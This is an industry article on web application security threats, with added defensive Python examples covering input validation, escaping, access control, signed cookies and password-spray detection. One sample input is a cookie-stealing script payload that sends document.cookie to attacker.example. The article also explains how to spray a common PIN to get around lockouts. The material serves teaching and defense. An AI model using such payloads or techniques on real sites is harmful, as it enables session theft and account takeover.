Companies are moving their mission-critical applications into web browsers.
Unfortunately, many of the features that make browsers so convenient are also
the ones that make them insecure. Web vulnerabilities open a door for attackers
to reach corporate systems and private customer data, and the resulting privacy
and compliance concerns, including identity theft, worry corporations and
consumers alike.
“It's essential that we protect our constituents' personal information. And
this is not a static concern, because hackers continue to adapt to
progressively sophisticated technologies,” said Chad O'Neal, Web Technical
Engineer, Blue Cross and Blue Shield, Kansas City. “To mitigate security risks,
organizations need continuous visibility into who's attempting to access what
information,” added Chad.
Companies are taking action to safeguard their applications, but traditional
firewalls and other tools that protect at the network level do little to turn
back probing attacks that exploit an application's specific vulnerabilities.
Most of the solutions available today only recognise known attack signatures.
Relying on this kind of negative (blacklist) security logic leaves companies
exposed to targeted attacks that no signature describes. To maintain data
security, companies need to shore up the security of the applications
themselves.
Andrew Stern
The root problem
Because the browser is under the user's control and will send whatever the
user, or an attacker, chooses, web-based applications are inherently exposed.
Once a user is logged into an application, the application's own logic is the
only thing restricting access to other users' data.
Therein lies the problem. Most of the security holes in corporate IT
infrastructure are based not on worms or viruses but on vulnerabilities in the
applications themselves. The majority of today's client applications were
written to work in tandem with a specific server application, and that tightly
coupled client-server model produced comparatively robust, secure applications.
Application differences and exploits
Four key differences between client-server and web-based applications are
the cause of most of the common security breaches that occur today. Hackers
exploit the variations between the two types of applications using several
common attack methods.
(Difference 1) Heavy client vs browser: Client-server applications rely on
the client to do the heavy lifting, including most data validation, and because
the client is compiled code, modifying the input it sends to the server takes
real effort (though it is by no means impossible). With browsers, the source of
the client-side application (the HTML, JavaScript and form definitions) is
available to anyone who loads the page, and is therefore trivial to change or
bypass; any validation done there is a usability aid, not a security control.
Exploiting the difference: Tricking the browser
Unlike heavy clients, browsers impose no constraint on what an attacker sends,
opening the door to attacks such as buffer overflows and cross-site scripting.
A buffer overflow overruns a parameter's memory allocation, which can
compromise the entire application. For example, a field might always expect a
10-digit phone number, so developers allocate just enough memory to hold those
10 digits. If hundreds of digits are submitted and the server copies them
without checking the length, the server application overwrites memory allocated
to other tasks, potentially crashing the process and leaving a core dump that
exposes whatever was in the server's memory. More serious overflows overwrite
control data such as a return address, letting the attacker run code of their
choosing on the server and tunnel through it to deeper infrastructure, as the
Code Red and SQL Slammer worms did.
Cross-site scripting inserts malicious script into web pages viewed by
others. The most common targets are bulletin boards and auction sites, where
users submit text that the site then displays to everyone else. A malicious
user could list an item for auction and, at the bottom of the description,
include a script that appends the viewer's cookie to an image request. Anyone
viewing that listing now sends his or her cookie, typically the session
identifier, to a web server of the attacker's choosing, and the attacker can
then impersonate those users on the site.
To protect against buffer overflow and cross-site scripting attacks, the
server must validate every input from the client (length, type and character
set) and encode user-supplied text before echoing it into a page. Network
devices that attempt this generically, however, miss many attacks (false
negatives), because without knowledge of the application they cannot tell where
script-like input is legitimate and where it is an injection.
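The two server-side checks just described, as an added example (not code from the original article): a positive length check on the 10-digit phone field, so an oversized value is rejected before it can be copied anywhere, and output encoding of an auction description so a cookie-stealing script is displayed as text rather than executed. The inputs, the attacker host attacker.example and the function names are constructed for this example.

```python
import html
import re

# Constructed sample inputs for this example (not from the original article).
PHONE_OK = "8165551234"
PHONE_OVERLONG = "9" * 300          # the "hundreds of digits" case
XSS_DESCRIPTION = (
    "Vintage lamp, works great! "
    '<script>new Image().src="http://attacker.example/c?"+document.cookie;</script>'
)

PHONE_RE = re.compile(r"[0-9]{10}")


def validate_phone(value: str) -> bool:
    """Positive validation: exactly ten ASCII digits, nothing else.

    The length is enforced here, before the value is copied into any
    fixed-size buffer or handed to native code, so an oversized input is
    rejected rather than overrunning memory.  fullmatch() is used instead
    of a '$' anchor because '$' would also accept a trailing newline.
    """
    return PHONE_RE.fullmatch(value) is not None


def render_description_unsafe(description: str) -> str:
    """Vulnerable: user text is concatenated straight into the page, so a
    <script> in an auction description runs in every viewer's browser."""
    return "<div class=item>" + description + "</div>"


def render_description_safe(description: str) -> str:
    """Hardened: HTML-escape on output.  '<', '>', '&' and quotes become
    entities, so the browser displays the payload as text instead of
    executing it.  The stored description itself is left unchanged."""
    return "<div class=item>" + html.escape(description, quote=True) + "</div>"


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show the difference between the renderers."""
    return "<script" in markup.lower()


def handle_listing(phone: str, description: str) -> dict:
    """Server-side handling of a listing form: reject a bad phone number
    outright and render the description safely."""
    if not validate_phone(phone):
        return {"status": 400, "error": "phone must be exactly 10 digits"}
    return {"status": 200, "html": render_description_safe(description)}
```

Escaping is done at output, not at storage, because the same text may later be emitted into a JavaScript string or a URL, each of which needs its own encoding; the application knows the context, a generic network filter does not.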
(Difference 2) One program vs many scripts: Client-server applications
typically have one program communicating with a client. In the web environment
there are multiple scripts, running on many different web servers, with many
different entry points.
Exploiting the difference: Jumping out of order
Because web applications consist of many scripts and files, each reachable by
its own URL, an attacker who simply edits the URL in the browser can often skip
the intended page sequence and reach restricted pages directly. This class of
flaw is called 'broken access control', and the technique 'forceful browsing'.
“Forceful browsing has become more acute, in part, because processes used to
be initiated and executed in a uniform, sequential manner over a single
connection,” noted Michael Suby, Program Director-Business Market Strategies,
Stratecast. “In contrast, web applications are non-linear, and normally do not
rely on previous processes to complete and notify the application before a
'next' process can begin. This non-linear nature is attractive to hackers
because it creates multiple application entry points. An attacker can often
bypass or compromise standard blocking procedures, such as login sequences, to
access processes that would typically only be available to a user after
producing the appropriate credentials.”
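An added example of the forceful-browsing problem and its fix (not code from the original article): a request handler that checks credentials only at the entry page of the account area, beside one that authorises every path on its own against an explicit policy and denies anything the policy does not list. The session store, paths, tokens and roles are constructed for this example.

```python
from typing import Optional

# Constructed server-side session store: opaque token -> principal.
# In a real deployment the token would be random and the store persistent.
SESSIONS = {
    "tok-alice": {"user": "alice", "role": "customer"},
    "tok-admin": {"user": "ops", "role": "admin"},
}

# Access policy covering every URL the application serves.  None means
# public; any path missing from the table is denied by default.
ACCESS_POLICY = {
    "/login": None,
    "/account/summary": "customer",
    "/account/transfer": "customer",
    "/admin/users": "admin",
}


def handle_request_vulnerable(path: str, token: Optional[str]) -> int:
    """Checks credentials only at the 'front door' of the account area and
    assumes deeper pages are reached through it.  Typing the deep URL
    directly (forceful browsing) skips the check entirely."""
    if path == "/account/summary":
        return 200 if token in SESSIONS else 403
    return 200  # /account/transfer, /admin/users ... served to anyone


def handle_request_hardened(path: str, token: Optional[str]) -> int:
    """Authorises every request on its own, independent of the sequence the
    browser followed.  Returns an HTTP status code."""
    required = ACCESS_POLICY.get(path, "<unlisted>")  # default deny
    if required is None:
        return 200                                    # public page
    principal = SESSIONS.get(token) if token else None
    if principal is None:
        return 401                                    # not logged in
    if principal["role"] != required:
        return 403                                    # logged in, wrong role
    return 200
```

The policy table is the important part: because it has to name every path, a new script added to the site is unreachable until someone decides who may call it, which is the opposite of the default in a sequence-based design.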
(Difference 3) State vs no state: In a client-server environment there is a
single, uninterrupted connection, so it is easy to track where users have been
and where they are going. HTTP is stateless: each request stands alone, so
developers have to find another way to track a user's so-called 'state' within
the application.
Exploiting the difference: Manipulating 'state' tools
The most common tools developers use to track state are cookies, dynamic
parameters (hidden form fields and query-string values) and dynamic links, each
of which is vulnerable to a different kind of tampering.
Cookies, which carry an identification tag that lets the server recognise a
user, can be 'poisoned' by editing them in an intercept proxy or directly in
the browser's cookie store before a request is sent. By changing a cookie, an
attacker can claim another user's identity and bypass authentication pages.
To protect against cookie poisoning and tampering with dynamic fields,
applications must store session data in cookies that are integrity-protected
(signed) as well as encrypted; encryption alone hides the content but does not
stop an attacker from substituting a value. For cookie poisoning, the check has
to be added at every point where a cookie is read, a relatively easy fix but a
considerable expenditure of time and resources.
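Cookie poisoning and the integrity check that stops it, as an added example (not code from the original article): the cookie carries a readable user id and role plus an HMAC-SHA256 tag over them, the server recomputes the tag on every read, and an intercept-proxy style edit of the identity fields is rejected. The key, cookie layout and function names are constructed for this example; a real application would also encrypt the payload if it must stay private, or keep the state server-side behind an opaque session id.

```python
import hashlib
import hmac
from typing import Optional

# Constructed demo key; in production load it from a secret store and rotate it.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"


def issue_cookie(user_id: int, role: str) -> str:
    """Cookie value 'user_id:role.tag' with tag = HMAC-SHA256(key, 'user_id:role').
    The payload stays readable; the tag is what makes it tamper-evident."""
    payload = f"{user_id}:{role}"
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def parse_cookie_unsigned(cookie: str) -> Optional[dict]:
    """The vulnerable pattern: trust whatever identity the client sends."""
    payload = cookie.rsplit(".", 1)[0]
    user_id, _, role = payload.partition(":")
    return {"user_id": int(user_id), "role": role} if user_id.isdigit() else None


def parse_cookie(cookie: str) -> Optional[dict]:
    """Hardened: recompute the HMAC over the payload and compare in constant
    time; any edit to user_id or role invalidates the tag."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None                                   # no tag at all
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None                                   # poisoned or corrupted
    user_id, _, role = payload.partition(":")
    return {"user_id": int(user_id), "role": role}


def poison_cookie(cookie: str, user_id: int, role: str) -> str:
    """What an intercept proxy or a hand-edited cookie file does: change the
    identity fields but keep the original tag, which the attacker cannot
    recompute without the key."""
    _, _, tag = cookie.rpartition(".")
    return f"{user_id}:{role}.{tag}"
```

hmac.compare_digest is used rather than == so that a mismatch is not reported faster for tags that share a longer prefix with the correct one, which would otherwise let an attacker recover the tag byte by byte through timing.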
(Difference 4) Hundreds of users vs millions of users: Applications built for
the client-server environment were designed to handle hundreds of users. Web
servers, by contrast, frequently handle millions of users, which increases the
chances that a malicious attack will be successful.
Exploiting the difference: Playing the numbers game
Attackers turn an application's millions of users to their advantage by
launching enumeration attacks, which coax the server into revealing the
resources it holds, such as valid user names and other database information.
For example, to circumvent a website's lockout policy that suspends an
account after a set number of failed login attempts, an attacker can write a
script that tries one Social Security number after another with the same PIN,
so that no single account ever reaches the threshold. Using a common PIN or
password such as 123456 or 'password', the script will compromise at least one
account within hours and many more within days.
To counter enumeration, applications can be redesigned to watch for
abnormally high rates of access to the login page, although a blunt global
throttle penalises all users by extending everyone's response time; a rule
keyed on the source of the attempts and on the number of distinct accounts it
touches targets the attacker more precisely.
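Detection logic for the attack just described, as an added example (not code from the original article), run over a constructed login log: the per-account lockout never fires because the attacker spends only one attempt per account, while a per-source rule that counts distinct accounts failed inside a time window flags the spraying source without slowing down ordinary users. The log entries, IP addresses and thresholds are all constructed for this example.

```python
from collections import Counter, defaultdict

# Constructed login-attempt log: (timestamp_s, source_ip, account, success).
LEGIT = [
    (0,  "10.0.0.5", "alice", False),   # typo, then success
    (8,  "10.0.0.5", "alice", True),
    (30, "10.0.0.5", "bob",   False),
    (35, "10.0.0.5", "bob",   False),
    (40, "10.0.0.5", "bob",   True),
]
# One source tries the same common PIN against 50 different accounts, one
# attempt each, and happens to get in on the 38th.
SPRAY = [(100 + i, "203.0.113.9", f"acct-{i:04d}", i == 37) for i in range(50)]
LOG = LEGIT + SPRAY

LOCKOUT_THRESHOLD = 5   # failures per account before the account is suspended
SPRAY_THRESHOLD = 20    # distinct accounts failed from one source within WINDOW
WINDOW = 300            # seconds


def locked_accounts(log) -> set:
    """The per-account rule the article mentions.  It never fires against
    spraying because each account sees only one failure."""
    failures = Counter(acct for _, _, acct, ok in log if not ok)
    return {acct for acct, n in failures.items() if n >= LOCKOUT_THRESHOLD}


def spraying_sources(log, window=WINDOW, threshold=SPRAY_THRESHOLD) -> set:
    """Per-source rule: flag a source whose failed logins touch at least
    `threshold` distinct accounts inside any `window`-second span."""
    by_source = defaultdict(list)
    for ts, src, acct, ok in log:
        if not ok:
            by_source[src].append((ts, acct))
    flagged = set()
    for src, events in by_source.items():
        events.sort()
        recent = Counter()   # account -> failures currently inside the window
        start = 0
        for ts, acct in events:
            recent[acct] += 1
            while events[start][0] < ts - window:   # evict expired events
                old = events[start][1]
                recent[old] -= 1
                if recent[old] == 0:
                    del recent[old]
                start += 1
            if len(recent) >= threshold:
                flagged.add(src)
                break
    return flagged
```

The per-source rule is only a first step: an attacker who spreads the same PIN across many addresses stays under it, so the same distinct-account count should also be tracked globally against a baseline, and the successful login on a sprayed account treated as suspect rather than as a normal sign-in.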
Preventing intrusions
Combating the security threats posed by malicious attacks is time consuming,
expensive and sometimes unreliable. Code reviews, extensive penetration testing
and network monitoring devices are a few of the ways companies are battling a
growing problem. Unfortunately, most of these strategies are reactive,
adequately protecting applications from known, generalized attacks but doing
little to safeguard against more malicious, targeted assaults.
Proactive application firewalls that can defend against unexpected browser
activity provide companies with more reliable, cost-effective security, enabling
them to deliver safe and dependable services to their customers.
(The author is Director-Strategy, F5 Networks)